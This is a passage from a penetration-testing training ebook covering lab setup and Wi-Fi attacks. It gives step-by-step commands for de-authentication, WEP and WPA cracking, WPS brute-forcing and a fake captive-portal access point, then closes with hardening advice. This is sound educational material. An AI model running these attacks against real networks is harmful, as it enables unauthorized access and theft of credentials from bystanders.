S_E_Oblako

S_E_Oblako

PENETRATION TESTING
STEP BY STEP
GUIDE

Second Edition

Radhi Shatob
S_E_Oblako

Copyright © 2021, Radhi Shatob

All rights reserved. No part of this book may be reproduced in any
form or by and electronic or mechanical means, including
information storage and retrieval systems, without permission in
writing form the publisher, except by reviewers, who may quote
brief passages in review.
ISBN 978-1-9995412-5-5 (Electronic Book)
ISBN 978-1-9995412-4-8(Book)
S_E_Oblako

This page is left Blank

S_E_Oblako

Contents
1. Lab Setup preparations
1.1. Lab setup:
1.2. Install VirtualBox software
1.3. Installation of Attacker Machine (Kali Linux)
1.4. Installation of Victim-1 Machine (Metasploitable)
1.5. Installation of Victim- 2 machine (windows 10)
1.6. Install VBox Extension Pack and Guest addition
1.7. USB Wi-Fi Adpator
2. Wi-Fi Penetration Testing
2.1. Putting card in monitor mode
2.3. Sniffing specific AP
2.4. De-authentication attacks
2.5. WEP encrypted networks crack
2.6. WPA Encrypted Network crack
2.7. EAPOL protocol
2.8. Fake access Point
2.9. Securing Wireless Network
3. Post Connection Attacks
3.1. Network discovering
3.2. Using NMAP tool
3.3. Man in the Middle Attacks (MiTM)
3.4. ARP Spoofing
3.5. MiTM with Bettercap tool
3.6. MITM DNS Spoofing
3.7. MiTM Java code injection
S_E_Oblako

3.8. MIMT Attack in Real Network

3.9. Detecting ARP storms by Wireshark
3.10. Preventing ARP Poisoning
4. Gaining Access (Server Side)
4.1. Server-Side attacks
4.2. Exploiting Basic vulnerability
4.3. Code Execution vulnerabilities
5. Vulnerability Scanning
5.1. Basic Vulnerability detection methods
5.2. Vulnerability Scanning software
5.3. Vulnerability Database
5.4. Vulnerability Management with Nexpose
5.5. Starting and Configuration Nexpose
5.6. Nexpose Reports Analysis
5.7. Other Nexpose functions
6. Gaining Access (Client Site Attacks)
6.1. Using Veil Evasion Framework
6.2. Installing Veil 3.1 In Kali Linux
6.3. How Anti-Malware work
6.4. Listening to incoming connectios
6.5. Delivery Method
6.6. Control hacked Devices with Kage Tool
6.7. Embedding Malware into PDF and JPG files
6.8. Protecting against smart delivery methods
7. Post exploitation
7.1. Metasploit meterpreter commands
7.2. Process impersonation
S_E_Oblako

7.3. Controlling Victim file system

7.4. Maintaining Access
7.5. Key-logger and screenshots
8. Social Engineering
8.1. Maltego
8.2. Email spoofing
9. Browser exploitation
9.1. Using BeEF to send backdoor
9.2. Hooking up a Mobile phone
10. Detecting Trojans
10.1. How Trojans works
10.2. Trojan Types
10.3. Protect against Trojans
10.4. Manual Trojans detection
10.5. Using Sandbox
11. Gaining access in real network
11.1. Configuring the router
12. Website penetration testing
12.1. Website (web Applications) components
12.2. Website Information Gathering
12.3. Discovering websites in the same Server
12.4. Subdomains
12.5. Finding Files and Directories
12.6. File uploads, code execution and file exclusion
12.7. Preventing above vulnerabilities
13. SQL injection
S_E_Oblako

13.1. Discovering SQL injection

13.2. Injecting a code in webpage
13.3. Discovering SQL injection in GET
13.4. Reading Database Information:
13.5. Read/write files using SQL vulnerability
13.6. Using Sqlmap tool
13.7. Protection from SQL injection
14. Cross Site Scripting XSS
14.1. Discovering XSS vulnerabilities
14.2. Stored XSS vulnerabilities
14.3. Injecting BeEF hook as a stored XSS
14.4. Preventing XSS Vulnerability
15. OWASP ZAP Web Site Penetration testing tool
15.1. Scanning Websites using OWASP-ZAP tool
16. Mobile phone penetration testing
16.1. Introduction
16.2. Mobile phone attack vectors
16.3. Outcomes of attack vectors
16.4. Mobile phone attack lifecycle
16.5. App Stores
16.6. Introduction Android OS
16.7. Android Authentication (screen lock)
16.8. Introduction to Apple iOS
16.9. iOS Authentication (screen lock)
16.10. Mobile Application Penetration Testing
17. Appendix 1: Realtek Driver update
18. Appendix2: Glossary
S_E_Oblako

Index of Pen-Tests Exercises

Exercise 1: Putting wireless card in Monitor mode
Exercise 2: Over the air wireless data capture
Exercise 3: Sniffing Specific Access Point
Exercise 4: De-authentication Attack
Exercise 5: WEP Encryption cracking procedure
Exercise 6: Cracking WPA using WPS feature
Exercise 7: Cracking WPA by capturing handshaking
Exercise 8 Creating Fake Access point using Wifipumpkin3
Exercise 9: Using Network Discovery tool netdiscover
Exercise 10: Using Network discovery tool arp-scan
Exercise 11: using Nmap
Exercise 12: ARP Spoofing using arpspoof tool
Exercise 13: Installing Bettercap tool
Exercise 14: ARP Spoofing with Bettercap
Exercise 15: Intercepting HTTP traffic with Bettercap
Exercise 16: Automating Bettercap attacks using Caplets
Exercise 17: SSL Stripping
Exercise 18: DNS Spoofing
Exercise 19: MITM -Java Code injection
Exercise 20: Detecting ARP storms with Wireshark
Exercise 21: Basic Information Gathering using Zenmap
Exercise 22: Exploit RSH client vulnerability
Exercise 23: Exploit Ftp vulnerability
Exercise 24: Exploiting Code Execution Vulnerability
Exercise 25: Vulnerability Management – installing Nexpose
Exercise 26: Running Nexpose
Exercise 27: Nexpose Analysis and Report Generating
Exercise 28: Client-Side Attacks – Installing Veil Evasion
Exercise 29: Creating Backdoor malware
Exercise 30: Setup Hacker machine to listen to Incoming connection
Exercise 31: Malware Basic Delivery Method
Exercise 32: Creating Encrypted backdoor
Exercise 33: Using Metasploit GUI Kage
Exercise 34 Embedding Malware into PDF file
Exercise 35 Embedding Malware inside image file
S_E_Oblako

Exercise 36: Post Exploitation

Exercise 37: Controlling victim file system
Exercise 38: Maintaining Access using persistence mode
Exercise 39: Setting up Key-logger
Exercise 40: Running Maltego Tool
Exercise 41: Email Spoofing using Sendinblue server
Exercise 42: Browser Exploitation with BeEF
Exercise 43: Hacking Windows 10 using BeEF
Exercise 44: Gaining Access in Real Networks
Exercise 45: Web Site Information gathering
Exercise 46: Discovering Subdomains with Knock Tool
Exercise 47: Finding Files and Directories
Exercise 48: File Upload
Exercise 49: Remote Code Execution
Exercise 50: File Inclusion
Exercise 51: Remote File inclusion
Exercise 52: Logging to Database
Exercise 53: Breaking a webpage
Exercise 54: Injecting Code into Webpage
Exercise 55: Login as Admin without a password
Exercise 56: Discovering SQL injection vulnerability with GET
Exercise 57: Reading and Extracting Data from Website
Exercise 58: Reading and writing files using SQL vulnerability
Exercise 59: Using Sqlmap tool
Exercise 60: Example of Reflected XSS
Exercise 61: Example of Stored XSS
Exercise 62: Injecting BeEF hook as stored XSS
Exercise 63: Running OWASP ZAP
Exercise 64: Start Website scan
Exercise 65: Scan Analysis
Exercise 66: Setting up Android testing environment
Exercise 67: Connecting a Physical android Phone to ADB tool
Exercise 68: Downloading a file or folder from Phone to PC
Exercise 69: Installing APK files into Android Virtual machine
Exercise 70: Getting Mobile App username and password
Exercise 71: Mobile App SQL injection
Exercise 72: Reading SQLite database in Android Phone
S_E_Oblako

Exercise 73: Hacking Real Android phone

S_E_Oblako

Preface
Penetration testing is the practice of penetrating networks, systems, and
applications to find vulnerabilities that hackers may use to infiltrate the
system and cause damage to the business. Penetration tests require hackers,
either a single skilled hacker or a team of hackers, to probe the network and
systems to access to the business data and information. The business’s
information security department is then informed by official report of the
vulnerabilities.
To meet some information security standards, businesses are required to
perform penetration tastings on a regular basis in order to keep certified by
the standard. For example, Payment Card Industry Data Security Standard
(PCI DSS) requires a yearly penetration test to be done by the businesses to
maintain certification. The demand for skilled penetration testers extremely
high and it will be higher in the coming years.
This book is intended for people who have no prior knowledge of penetration
testing, ethical hacking and would like to enter the field. This is not a
theoretical book but a practical step by step guide to penetration testing that
teaches the techniques and tools that real hackers use to hack networks and
exploit vulnerabilities. The guide is based in Kali Linux and other tools that
real hackers use. This guide assumes that readers have no knowledge Kali
Linux and teaches you through penetration testing exercises. This guide
covers the all the phases of penetrations testing starting from reconnaissance,
scanning, gaining access, maintaining assess and covering tracks. The main
feature of the guide will be 73 Pen-tests exercises that cover wireless and Wi-
Fi penetration testing, client side penetration testing, server side penetration
testing, creating and delivering malware, social engineering, email spoofing
,complete web penetration testing and Mobile phones penetration testing. I
hope you find this guide helpful and insightful as you learn more about
penetration testing.

Radhi Shatob
S_E_Oblako

Who is this Book for?

This book is a hands-on guide, it is for anyone interested in Information
security and wanted to know how hackers hack systems, what tool they use
and how they do information gathering about their target. This book is aimed
at people who are new to the world of ethical hacking and penetration testing,
it is for those with little or no previous experience and not sure where to
begin. However, this book is also good for Information Security Managers
and Information Technology managers in general who want to understand
what the threats to their systems, what tools hackers use and what measures
they need to take in order to protect their systems and networks.
This Book goes straight to the point of hacking and does not go in detail in
the theoretical aspects, it is a practical hands on guide that explains in easy to
follow instructions, how to setup up testing environment and how to do each
penetration test. It lists the steps and guide the user about the commands
needed and show the expected results in screen shots for each exercise. At the
end of this book not only you will gain the knowledge about how to perform
penetration testing, but also you will know how to use Kali Linux and Linux
in general, because the book assume the reader has no prior knowledge in
Kali Linux which the main operation system of Penetration testing.
S_E_Oblako

White Hat ethical hacker Ethics

This book teaches you to be a penetration tester in other word a white hat
ethical hacker. The exercises listed in this book can be very harmful and
illegal to do in real environment without prior permission to conduct such
activities against any information system, network or normal client who use
computing devices.

Do not be malicious.
Do not use skills learned in illegal activities.
If you are doing Penetration testing for external Client, keep all
data gathered during the penetration testing confidential and do
not not reveal the Data to anyone without the consent of the
client.
Do not use computer to harm or interfere with other people’s
work.

Neither the author of this book, nor the publisher encourage the misuse of the
penetration testing exercises listed in this book.
S_E_Oblako

1
LAB SETUP

This chapter will guide readers in setting up the environment, so

they will be able to do all the Exercises in the following chapters,
assuming you have a laptop with minimum 8G RAM and 64 G
Disk space (Windows or Mac). The chapter will guide you through
the installation of Oracle Virtual Box software, Kali Linux virtual
machine, Windows 10 virtual machine and Ubuntu Linux machine
that has vulnerabilities, also the guide will explain the Wireless
card setup with the host and Kali Linux.
S_E_Oblako

1. Lab Setup preparations

To do all the labs in this training course, you need to have the following:

Windows or mac (host machine) with minimum 8G Ram (16G

RAM is recommended)
Minimum 80G disk space. (250G is recommended for the host
machine)
The lab will depend on installation of three virtual machines.

1.1. Lab setup:

- Laptop (host machine)
- Installation of VirtualBox
- Installation of Attacker Virtual machine Kali Linux
- Installation of victim machine 1: Virtual Metasploitable (Ubuntu Linux
machine)
- Installation of victim machine 2: Virtual Windows 10
- Need External USB Wi-Fi card that compatible with host machine and
Kali Linux to do wireless penetration labs

1.2. Install VirtualBox software

- You will need Windows or Mac machine with minimum 8G Ram and
64G Free disk space.
- Download VirtualBox software from the following link:
https://www.virtualbox.org/wiki/downloads
- Install VirtualBox software.
Note
Virtualization must be enabled in the laptop BOIS to run 64-bit virtual
machines inside VirtualBox.
1.3. Installation of Attacker Machine (Kali Linux)
- To install Kali Linux image, go to (https://www.kali.org/downloads/).
- Download Kali Linux 64-bit VirtualBox (Image for Virtual Box).
- Double click the downloaded file and it will install itself under VB
software.
- Give Kali 4G Ram and at least 20G Disk space.

1.4. Installation of Victim-1 Machine (Metasploitable)

S_E_Oblako

Metasploitable is a vulnerable Linux distro made by Rapid7. This OS

contains several vulnerabilities. It is designed for pen testers to try and hack.
Rapid 7 offer this software for free for the Penetration testers community,
they just need to register with Rapid 7 and then download the Metasplotable
virtual machine.
You can download Metasploitable from the following link:

https://information.rapid7.com/metasploitable-download.html

- to install Metasploitable in VirtualBox (Vbox):

In Vbox click on New.

Give it a Name, Type= Linux, Version= Ubuntu 64k.
Next and give it 512 M Ram or 1 G ram then Next.
Choose “Use an existing virtual hard disk file “.
Go to the Metasploitable file location and choose .vmdk file.

1.5. Installation of Victim- 2 machine (windows 10)

We will also install a normal windows 10 machine as a victim, we will be
running our attacks against this machine.
Microsoft has released several windows virtual machines that can be
downloaded from the following link
- https://developer.microsoft.com/en-us/microsoft-edge/tools/vms
- download Win10.0va file.
- right click the file and choose open with Virtual box.
- Agree on import setting.
1.6. Install VBox Extension Pack and Guest addition
After the installation of the three machines, we need to install VirtualBox
extension pack that allow you to share files between host machine and virtual
machines and resize of the virtual machine screen and other options that
make working with virtual machines easy.
download extension pack and install from
https://www.virtualbox.org/wiki/downloads
After finishing installing Virtual machines and for Better integration with
host desktop and mouse install VB guest addition, so the following link for
S_E_Oblako

more info about installing guest addition.

https://docs.oracle.com/cd/E36500_01/E36502/html/qs-guest-additions.html
for Kali Guest addition follow the following procedure:
In Kali machine open Terminal and enter the following commands:
#apt purge virtualbox-guest-x11
#apt autoremove --purge
#reboot
#apt update
#apt dist-upgrade
#reboot
#apt update
#apt install -y virtualbox-guest-x11
#reboot
Note
Oracle keep changing the location of the Extension Pack and Guest Edition in
their website.
S_E_Oblako

Configure NAT in Virtual Box

- Normally Virtual machines are isolated from each other and cannot
directly communicate with each other.
- Create NAT network in VirtualBox to allow virtual machines
communications.
- In Windows or MAC to create NAT network go to Virtual Box
File/Preferences/ Network/add New NAT Network.

- Right click the VMs, go to setting, Network, and choose NAT network
as follow
S_E_Oblako

Do this step for all machines.

Updating Kali Linux
- Open VirtualBox and start Kali Linux and login as:
- User: kali
- Password: kali
- Open terminal and type the following commands:
#sudo apt-get update

#sudo apt-get install terminator (terminal software more flexible than the
build in terminal software)
#sudo apt-get upgrade
To avoid typing sudo each time you enter a command, login as root but first
you should setup password for the root account, the following procedure
show how to setup a root password
1. Login as kali/kali
2. Type #sudo su and enter Kali password
S_E_Oblako

3. At the root account type #passwd

4. Enter a password such as toor
S_E_Oblako

Logout Kali and log back in as root/toor

S_E_Oblako

1.7. USB Wi-Fi Adpator

Wi-Fi USB adaptor is a wireless card that will be used in Kali Linux
Wireless training to monitor and inject packets over the air. The build-
in wireless cards are unmanaged cards and cannot monitor the
available Wi-Fi access point on the air.
Most of the USB wireless cards that used to work smoothly with Kali
Linux until the introduction of Kali 2020 which have Linux kernel 5.4.
In Kali 2020.2 do the following to install new drivers for the cards:
- Check the card chipset using command
#airmon-ng
- If the chipset is Ralink then
#apt install firmware-ralink
S_E_Oblako

- If the chipset is Realtek then follow the procedure in Appendix 1

Some of the USB Wi-Fi cards that tested with Kali-Linux

2020.2
S_E_Oblako

Attaching Card to Kali Linux

To attach the card to Kali virtual machine, see the screenshot below.
- The card should be connected to host
- In Virtual Box highlight Kali machine, then click Setting /USB
- If the card does not appear, click the + to add the card

Starting Wireless Network Card

- Unplug the card
- Start Kali
- Plug the card again – if the card working green light should be flashing
in the USB Icon on kali
S_E_Oblako

- Type #iwconfig

Changing mac address

Commands:
#ifconfig wlan0 down
#macchanger --random wlan0
#ifconfig wlan0
S_E_Oblako

2
Wi-Fi Penetration Testing

In this chapter you will learn how to use special wireless card to
collect packets off the air and monitor Wi-Fi traffic plus cracking
WEP and WPA WI-FI encrypted networks also you will learn how
to make a fake access point and collects Packets that passing
through your access point. At the end of the chapter there is guide
on how to protect wireless Wi-Fi network from such attacks
S_E_Oblako

2. Wi-Fi Penetration Testing

Wi-Fi or wireless penetration testing is an important aspect of any security
audit project, organizations are facing serious threats from their insecure Wi-
Fi network. A compromised Wi-Fi puts the entire network at risks. In this
section we are going to run many exercises to see Wi-Fi traffic off the air, de-
authenticate legitimate users from Wi-Fi connection, setting up Fake Access
point and lure people to it, crack WEP and WPA
2.1. Putting card in monitor mode
Exercise 1: Putting wireless card in Monitor mode
1. Start Kali Linux VM
2. Check Kali version

# grep VERSION /etc/os-release

3. To see what Kernel version, type

#hostnamectl
Putting card in to monitor mode will allow it to capture any packets off the
air, even packets not directed to its mac address
S_E_Oblako

Card Mode - Managed: if the card mode is managed, it will only can see the
packets that targeted the card mac address or broadcast, to make the card to
see all packets in the air it has to be changed to monitor mode.

4. Changing the Card to Monitor Mode:

#iwconfig
#ifconfig wlan0 down
#airmon-ng start wlan0

2.2. Over the air wireless data packets capture

airodump-ng utility allows the card to capture all traffic in the air if the card
is set to monitor mode, it will show all Access Points that it can see
S_E_Oblako

Exercise 2: Over the air wireless data capture

1. #airodump-ng wlan0mon

2. If you do not see any output

b. Disconnect the card from the USB port.

c. Connect the card pack with Kali running.
d. Put the card in monitor mode.
e. Run airodump-ng again.

Output
S_E_Oblako

2.3. Sniffing specific AP

Exercise 3: Sniffing Specific Access Point
Commands:
Airodump-ng: utility
--channel: channel number that the AP working on
--based: mac address of the AP
--write: to send the captured output to file (test-upc)
Wlan0: wireless card name
S_E_Oblako

Finding the captured file:

In Kali type: #ls
S_E_Oblako

2.4. De-authentication attacks

De-authentication attack enables the attack to disconnect any device from the
target access point.

Exercise 4: De-authentication Attack

1. Make sure the card is working using command.

#iwconfig

2. If the card is not in monitor mode. Put it in monitor mode.

3. Check the packets over the air to decide which access point that will
attack using command

#airodump-ng wlan0
S_E_Oblako

4. Check how many devices connected to the target AP using

command airodump

#airodump-ng --channel x –bssid xx:xx:xx:xx:xx:xx card name

S_E_Oblako

5. Use command aireplay to start deauth attack

#aireplay-ng --deauth [number of packets ] -a [AP Mac] -c [ device Mac]

card name
S_E_Oblako

6. You should notice that the device disconnected from internet

7. To monitor access points that works on 5 Gigahertz band

#airodump-ng –band a wlan0

S_E_Oblako

2.5. WEP encrypted networks crack

WEP is an old Encryption but it is still in use in some networks, therefore I
will explain how to break it.
WEP algorithm called RC4 where each packet is encrypted by the access
point and then decrypted at the client side. WEP ensure that each packet is
encrypted by a unique key stream using random 24-bit initializing factor
(IV), This IV is contained in packets as plain text. In a busy network, if we
can collect more than two packets with the same IV, then aircrack tool (
aircrack-ng) can be used to determine the key stream and the WEP key using
statistical attacks.
Conclusion: the more IV we can collect, the more likely for us to crack the
WEP key

Exercise 5: WEP Encryption cracking procedure

Set the card in monitor mode

See AP nearby using command “ airodump-ng wlan0 ”

S_E_Oblako

Collect packets from the AP you want to attack using command

#airodump-ng -–channel [ch. Number] -–bssid [bssid name] -–write

[file name] [interface]

Use aircrack-ng tool to crack the key from the captured file as the
following example:

#aircrack-ng [filename]
Ex: #aircrack-ng out-01.cap
Notes

The higher the encryption key (24 bit, 32 bit , 64bit or 128bit )
the more time required to crack the key.
The busier the network (more packets generated and collected)
the shorter time needed to crack the network).
You can have both tools ( airodump-ng ) and ( aircrack-ng)
S_E_Oblako

working at the same time with aircrack-ng is taking the

airodump-ng output ) until aircrack find the key

`
S_E_Oblako

Output of aircrack-ng utility

To use the key just remove the dots from it (B48CE760CA)

If there are not enough users in the network or users is not

generating enough packets to collect and crack the key, we can
inject data to the router to generate more IV.
Normally router Ignore any packets coming from the user that are
not connected.
Before injecting packets to the router, we are going to do fake
authentication with the router.
Fake authentication will force the router to check incoming packets
from non-associated device.
Here are the steps of fake authentication:

Commands:
#aireplay-ng –fakeauth [number of packets] -a [target MAC] -h [your MAC]
[interface]
Ex. #aireplay-ng –fakeauth 100 -a E0:69:95:B8:BF:77 -h
00:C0:CA:6C:CA:12 Wlan0mon

Fake Authentication command:

#aireplay-ng –fakeauth 10000 -a 00:10:18:90:2D:EE -h

00:c0:ca:6c:ca:12 wlan0

After the command notice the AP AUTH parameter

The AUTH parameter is changed to open and our device shows as if it
connected to the network but in fact it is not connected, however the AP will
read what we will sent to it and that’s make it easy to inject packets
The way to inject packet is to capture ARP packet coming from the AP and
S_E_Oblako

send it back to the AP and in the same time taking the output file and send it
to aircrack-ng tool to find the key
S_E_Oblako

2.6. WPA Encrypted Network crack

WPA found after WEP to address all the weaknesses of WEP like
initialization vector that sent in plain text and the possibility of having similar
IV in more than one packet in a busy or injected network which will allow a
tool like aircrack-ng to do statistical attack and find the key from similar IVs
collected.
In WPA there is no IV and each packet is encrypted using a unique
temporary key which means that the collection of packet is irrelevant because
even if we collect one million packet there is no information in the packet
that can help us to crack the key.
WPA2 is the same as WPA, the only difference is that WPA2 uses different
algorithm to encrypt packets.
During the authentication process the supplicant (client) and authenticator
(access point) each attempt to prove that they independently know the pre-
shared-key (PSK) passphrase without disclosing the key directly. This is done
by each encrypting a message using the Pairwise-Master-Key (PMK) that
they have generated, transmitting each way, and then decrypting the message
they've each received. The four-way handshake is used to establish a new key
called the Pairwise-Transient-Key (PTK), which is comprised of the
following data:

Pairwise Master Key

Authenticator Nonce
Supplicant Nonce
Authenticator MAC Address
Supplicant MAC Address

The result is then processed through a Pseudo-Random-Function (PRF).

Another key that is used for decrypting multicast traffic, named the Group-
Temporal-Key, is also created during this handshake process.
Actual Handshake Process

Initially the access point transmits an A Nonce key to the client

within the first handshake packet.
The client then constructs its S Nonce, along with the Pairwise-
Transient-Key (PTK), and then submits the S Nonce and Message
Integrity Code (MIC) to the access point.
S_E_Oblako

Next the access point constructs the Group-Temporal-Key, a

sequence number that is used to detect replay attacks on the
client, and a Message Integrity Code (MIC).
Lastly the client then sends an acknowledgement (ACK) to the
access point.

At this point an attacker would have been able to intercept enough of the
handshake to perform a password cracking attack.
Construction of the PMK
Pairwise-Master-Keys are used during the creation of the Pairwise-Transient-
Keys and are never actually transmitted across the network. They are derived
from the Pre-Shared-Keys (Enterprise Wi-Fi uses a key created by EAP)
along with the other information such as SSID, SSID Length. The PMKs are
created using the Password-Based Key Derivation Function #2 (PBKDF2),
with the SHA1 hashing function used with HMAC as the message
authentication code:
PMK = PBKDF2(HMAC−SHA1, PSK, SSID, 4096, 256)
HMAC-SHA1 is the Pseudo Random Function used, whilst 4096 iterations of
this function are used to create the 256-bit PMK. The SSID is used as a salt
for the resulting key, and of course the PSK (passphrase in this instance) is
used as the basis for this entire process.
Construction of the PTK
The creation of the Pairwise-Transient-Keys is performed via a another PRF
(using an odd combination of SHA1, ending in a 512-bit string), which uses a
combination of the PMK, AP MAC Address, Client MAC Address, AP
Nonce, Client Nonce. The result is this 512 bit Pairwise-Transient-Key,
which is a concatenation of five separate keys and values, each with their
own purpose and use:

Key Confirmation Key (KCK) - Used during the creation of the

Message Integrity Code.
Key Encryption Key (KEK) - Used by the access point during data
encryption.
Temporal Key (TK) - Used for the encryption and decryption of
unicast packets.
MIC Authenticator Tx Key (MIC Tx) - Only used with TKIP
S_E_Oblako

configurations for unicast packets sent by access points.

MIC Authenticator Rx Key (MIC Rx) - Only used with TKIP
configurations for unicast packets sent by clients.

What is computed for cracking?

Once the second packet of the handshake has been captured an attacker has
enough information to attempt to compute the Pairwise-Transient-Key
(using an assumed PSK passphrase), which can then be used to extract the
Key-Confirmation-Key and compute the Message Integrity Code. It is this
MIC that is used during the comparison with the genuine MIC to determine
the validity of the assumed PSK.
This whole process is re-run for every dictionary entry (or brute force
attempt) during password cracking. The MIC is calculated using
HMAC_MD5, which takes its input from the KCK Key within the PTK.

Exercise 6: Cracking WPA using WPS feature

In most routers that uses WPA there is a feature called WPS, this feature
allow client to connect easily to router using 8-digit long PIN, the purpose of
this feature is to connect some devices like printers easily to the router. The
WPS feature must be enable from the router first and some routers have a
bottom called WPS need to be pressed to connect to the router automatically.
- Using brute force attack the WPS PIN can be guessed in 10 hours.
- A Kali Linux tool called Reaver can recover WPA key from WPS PIN.
- Use command:
#wash -i wlan0 (to find which AP with WPS lock set to know)
#reaver -b [mac address of AP] -c [channel number] -i [interface] (This
will start the brute force attack on the access point).
S_E_Oblako

Any access point shows WPS = 1 that mean WPS is enabled in that access
point.

Reaver support start and resume, if you cancel the attack after reaver
reaches 30% of brute force attack and then resume later for the same
AP it will resume from 30%
#reaver -–help (for more advanced options in reaver)
If you use -vv and -f with the reaver command, then the tool will
show more information about what pin it is trying to crack.
Reaver may take hours to crack the WPS PIN.

Exercise 7: Cracking WPA by capturing handshaking

S_E_Oblako

This method of cracking WPA depend on capturing the handshake between

AP and client machine that has legitimate access and start by checking the
AP and see if there is connected clients, then run de-authentication attack to
force the client to disconnect from the AP and reconnect again, while
capturing the packets of handshake between the AP and the client , the
handshake contain the AP access password encrypted, after capturing the
encrypted password we use aircrack tool to launch a word-list attack against
the handshake to determine the AP key.
To crack WPA network we need two things:
- Capture of the handshake
- A wordlist
Handshake capture procedure
S_E_Oblako

1. Put the card in to monitor mode

2. Start airodump-ng (wireless card must be in monitor mode)
#airodump-ng wlan0mon
S_E_Oblako

3. Capture packets from specific AP and send them to a file.

4. Force handshake using de-authentication attack

S_E_Oblako

5. Open new terminal window and type the following command to force
client to disconnect and connect back again to capture the handshake
while airodump still running and writing to file
#aireplay-ng –deauth 5 – a <AP mac> - c < client mac> wlan0mon

Airodump will show the handshake as follow:

Stop the live capture and check the file using Wireshark to make
sure that the file captured contain at least 4 handshake packets.
Open file manager /home and check the captured file named hs

Start Wireshark from terminal #wireshark then open the hs-01.cap

S_E_Oblako

file

In wireshark search for “eapol” The handshake protocol

S_E_Oblako

After capturing the handshake, we need a tool to guess the password

using wordlist, if the tool could not guess the password, we cannot
open the handshake to know the wireless key
You can download ready-made word lists from the internet, from
the following resources:

ftp://ftp.openwall.com/pub/wordlists/
http://www.openwall.com/mirrors/
https://github.com/danielmiessler/SecLists
http://www.outpost9.com/files/WordLists.html
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://wordlist.sourceforge.net/
Or you can create your own wordlist using “crunch” tool that comes part of
Kali
#crunch [min] [max] [characters=lower|upper|symbos] -t [pattern] -o file
For the pattern if you know some characters of the password but not all you
can put them here, like the password start with A and end with U so you
can put A@@@@@@U

Now we are going to use the aircrack-ng tool to crack the key , it
does this by combining each password in the wordlist file with the
AP name ( ESSID) to compute Pairwise Master Key ( PMK) using
the pbkdf2 algorithm the PMK is compare to the handshake file.
S_E_Oblako

Summary steps for cracking WPA2:

Put the wireless card in monitor mode

Find the Access point that you need to crack and make sure that
there are clients connected to the AP
Use airodump-ng tool to capture the AP packets and save the
output to a file.
Make de- authentication attack on the AP to force client to re-
associate with the AP (use different terminal to keep the airodump-
ng running)
After de-authentication finish stop the airodump-ng.
Make sure that handshaking (eapol packets are captured using
wireshark to check the file).
Create word list using crunch or have already made word list.
Use aircrack-ng to crack the WPA password.

2.7. EAPOL protocol

Extensible Authentication Protocol, or EAP, is
an authentication framework frequently used in wireless
networks and point-to-point connections. It is defined in RFC 3748,
and is updated by RFC 5247.
EAP is an authentication framework for providing the transport and
usage of keying material and parameters generated by EAP
S_E_Oblako

methods. There are many methods defined by RFCs and several

vendor specific methods and new proposals exist. EAP is not a wire
protocol; instead, it only defines message formats. Each protocol
that uses EAP defines a way to encapsulate EAP messages within
that protocol's messages.
Note
Decrypting Wi-Fi frames will not show all the traffic as a clear text,
because Some traffic is encrypted from the source or application.
Example is https traffic which is encrypted by the browser application
and then encrypted again by the Wi-Fi protocol, when the Wi-Fi
frame is decrypted the result is https encrypted data.
S_E_Oblako

2.8. Fake access Point

By creating Free Wi-Fi Access point or fake access point hackers can easily
attract people to connect to their Access point, especially in public places that
have open Wi-Fi networks, when a victim connect to Fake Access Point he
will get full access to internet but all of his traffic is passing through the
attacker PC. The attacker can see all the victim unencrypted traffic, can
present the victim with fake login screen to steal his credentials and can see
victim emails.
Fake access Point can be created very easily using Alfa card or any wireless
card that can be set to monitor mode and can inject packets , there are many
software tools available to allow us crate access point such as Wifipumbkin3
tool.

Exercise 8 Creating Fake Access point using Wifipumpkin3

1. Download and install wifipumpkin3 from GitHub
#git clone https://github.com/P0cL4bs/wifipumpkin3.git
#apt install libssl-dev libffi-dev build-essential
#apt install python3-pyqt5
#cd wifipumpkin3
#python3 setup.py install
If installation is successful you get the following message at the end of
installation
“Finished processing dependencies for wifipumpkin3==1.0.0”
Before starting Wifipumpkin3 make sure both networks adapters are
running , the Alfa card should be in managed mode and should not be
connected to any Wi-Fi network
S_E_Oblako

2. Start wifipumpkin3
#wifipumpkin3 -i wlan0
S_E_Oblako

wp3> help
S_E_Oblako

3. see the running proxy

S_E_Oblako

4. wp3>set proxy captiveflask

5. check the fake access point setting wp3> ap

S_E_Oblako

-type wp3>start

You should see a network called wifipumpkin 3

When a device is connected to the network you will see the device
mac address and then its traffic
S_E_Oblako
S_E_Oblako

6. To change the Access point name, stop pumpkin3

Wp3>stop
Wp3>set ssid FREE_INTERNET
Wp3>start
S_E_Oblako

2.9. Securing Wireless Network

Now that we know how to test the security of all known wireless encryption
(WEP/WPA/WPA2), it is relatively easy to secure our networks against these
attacks if we know all the weaknesses that can be used by hackers.
- WEP: WEP is an old encryption, and it’s really weak, as we seen in the
course there are a number of methods that can be used to crack this
encryption regardless of the strength of the password and even if there is
nobody connected to the network. These attacks are possible because of
the way WEP works, we discussed the weakness of WEP and how it can
be cracked, some of these methods even allow you to crack the key in a
few minutes.
- WPA/WPA2: WPA and WPA2 are similar, the only difference between
them is the algorithm used to encrypt the information but both
encryptions work in the same way. WPA/WPA2 can be cracked in two
ways:

If WPS feature is enabled then there is a high chance of

obtaining the key regardless of its complexity, this can be done
by exploiting a weakness in the WPS feature. WPS is used to
allow users to connect to their wireless network without
entering the key, this is done by pressing a WPS button on both
the router and the device that they want to connect, the
authentication works using an eight digit pin, hackers can brute
force this pin in relatively short time (in an average of 10
hours), once they get the right pin they can use a tool called
reaver to reverse engineer the pin and get the key, this is all
possible due to the fact that the WPS feature uses an easy pin
(only 8 characters and only contains digits), so it's not a
weakness in WPA/WPA2, it's a weakness in a feature that can
be enabled on routers that use WPA/WPA2 which can be
exploited to get the actual WPA/WPA2 key.
If WPS is not enabled, then the only way to crack WPA/WPA2
is using a dictionary attack, in this attack a list of passwords
(dictionary) is compared against a file (handshake file) to check
if any of the passwords is the actual key for the network, so if
the password does not exist in the wordlist then the attacker
will not be able to find the password.
S_E_Oblako

Conclusion:
- WEP encryption is an old encryption method and have major
vulnerability and should not be used at all, as it can be cracked easily
regardless of the complexity of the password and even if there is
nobody connected to the network.
- Use WPA2 with a complex password, make sure the password
contains small letters, capital letters, symbols, and numbers.
- Enterprises that have Active Directory and wireless controller should
integrate the access to the Wi-Fi with Active directory so no shared
Wi-Fi password is used.
- WPS feature is disabled in Wi-Fi Routers as it can be used to crack
your complex WPA2 key by brute-forcing the easy WPS pin.
S_E_Oblako

3
Post Connection Attacks

